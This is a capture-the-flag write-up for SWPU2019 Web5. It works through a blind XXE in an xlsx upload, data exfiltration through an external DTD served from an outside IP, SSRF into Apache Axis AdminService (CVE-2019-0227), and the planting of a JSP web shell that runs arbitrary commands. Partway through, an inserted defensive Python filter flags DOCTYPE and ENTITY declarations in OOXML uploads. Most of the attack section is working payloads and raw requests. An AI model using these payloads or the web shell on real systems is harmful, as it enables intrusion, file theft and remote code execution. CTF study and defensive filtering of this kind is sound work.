[SWPU2019]Web5
The challenge provides an address-book import/export feature. Export produces an xlsx file, so the guess is that XXE is triggered when the uploaded Excel file is parsed.
Verify it:
Write the PoC into [Content_Types].xml, then zip the package back up.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANYTHING [
<!ENTITY % test SYSTEM "http://124.70.40.5:1234">
%test;
]>
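As an added example (not part of this writeup), the server-side gate a defender would put in front of the import feature: it opens the uploaded xlsx as a zip and rejects any XML part carrying a DOCTYPE or ENTITY declaration before an XML parser ever sees it, using the PoC above as the malicious sample. The package layout and the attacker.invalid callback host are constructed.

```python
import io
import re
import zipfile
# Constructed sample: the writeup's PoC placed in [Content_Types].xml of a
# minimal xlsx-like package (the callback host is a placeholder).
MALICIOUS_PART = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANYTHING [
<!ENTITY % test SYSTEM "http://attacker.invalid:1234">
%test;
]>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>
"""
BENIGN_PART = b"""<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
<Default Extension="xml" ContentType="application/xml"/>
</Types>
"""
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
ENTITY_RE = re.compile(rb"<!ENTITY\b", re.IGNORECASE)

def build_xlsx(content_types):
    """Constructed test input: an in-memory zip shaped like an xlsx."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("xl/workbook.xml", b"<workbook/>")
    return buf.getvalue()

def _normalize(data):
    # A UTF-16 part (with BOM) would slip past a byte regex; fold it to UTF-8.
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16").encode("utf-8")
    return data

def find_dtd_parts(xlsx_bytes):
    """Return (part_name, reason) for every XML part of the OOXML package that
    carries a DOCTYPE or ENTITY declaration. OOXML never needs a DTD, so any
    hit is grounds to reject the upload before an XML parser ever sees it."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".xml", ".rels")):
                continue
            data = _normalize(zf.read(info))
            if DOCTYPE_RE.search(data):
                findings.append((info.filename, "DOCTYPE declaration"))
            elif ENTITY_RE.search(data):
                findings.append((info.filename, "ENTITY declaration"))
    return findings
```

This is only a pre-filter (it will also flag a DOCTYPE inside an XML comment); the actual fix is to parse every part with DTD processing and external entities disabled, which for Java's Xerces-based parsers means enabling the disallow-doctype-decl feature.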
This confirms the XXE exists. The flag cannot be read directly, so use Java's file protocol to list directories; since there is no echo, this is a blind XXE.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % fmyyy SYSTEM "http://124.70.40.5/evil.dtd">
%fmyyy;
]>
Contents of evil.dtd:
<!ENTITY % file SYSTEM "file:ctffffff/backups">
<!ENTITY % dtd "<!ENTITY % xxe SYSTEM 'http://124.70.40.5:1234/?%file;'> ">
%dtd;
%xxe;
A backups directory shows up; download it: /ctffffff/backups/backup-af7f385c8840f173779124df915b6ebb.zip
Reading web.xml shows that a FlagServlet is registered, but there is no permission to read /flag.
Axis is present; check its version information.
That version happens to have an RCE:
CVE-2019-0227
https://paper.seebug.org/1489/#141-rceservicehandler
The POST request from the article cannot get through here, because that vulnerability has preconditions; but XXE can be used for SSRF, so try the GET request instead. The first one in the article works; the path has to be changed to axis/shell.jsp.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % fmyyy SYSTEM "http://127.0.0.1:8080/axis/services/AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22randomBBB%22%20provider%3D%22java%3ARPC%22%3E%3CrequestFlow%3E%3Chandler%20type%3D%22java%3Aorg.apache.axis.handlers.LogHandler%22%20%3E%3Cparameter%20name%3D%22LogHandler.fileName%22%20value%3D%22..%2Fwebapps%2Faxis%2Fshell.jsp%22%20%2F%3E%3Cparameter%20name%3D%22LogHandler.writeToConsole%22%20value%3D%22false%22%20%2F%3E%3C%2Fhandler%3E%3C%2FrequestFlow%3E%3Cparameter%20name%3D%22className%22%20value%3D%22java.util.Random%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22*%22%20%2F%3E%3C%2Fservice%3E%3C%2Fdeployment">
%fmyyy;
]>
Visiting it shows the service was deployed successfully.
Then POST to /axis/services/randomBBB
(the path corresponds to the service name deployed above)
POST /axis/services/randomBBB HTTP/1.1
Host: 19d5d55d-6db4-4ac4-ab93-d0f1debc8c0f.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/xml
SOAPAction: something
Content-Length: 874
Origin: http://19d5d55d-6db4-4ac4-ab93-d0f1debc8c0f.node4.buuoj.cn:81
Connection: close
Referer: http://19d5d55d-6db4-4ac4-ab93-d0f1debc8c0f.node4.buuoj.cn:81/axis/services/AdminService
Cookie: __gads=ID=df4db7075da356b3-22a4b6a235c800b4:T=1620812094:RT=1620812094:S=ALNI_MbStkXgvBJ8Ws8Umu-eWCgWwB0rTw; UM_distinctid=17cb52e2bac47c-0b11a0162b7f1d-455e6d-1fa400-17cb52e2bad4d8
Upgrade-Insecure-Requests: 1

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<api:main
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<api:in0><![CDATA[
<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
]]>
</api:in0>
</api:main>
</soapenv:Body>
</soapenv:Envelope>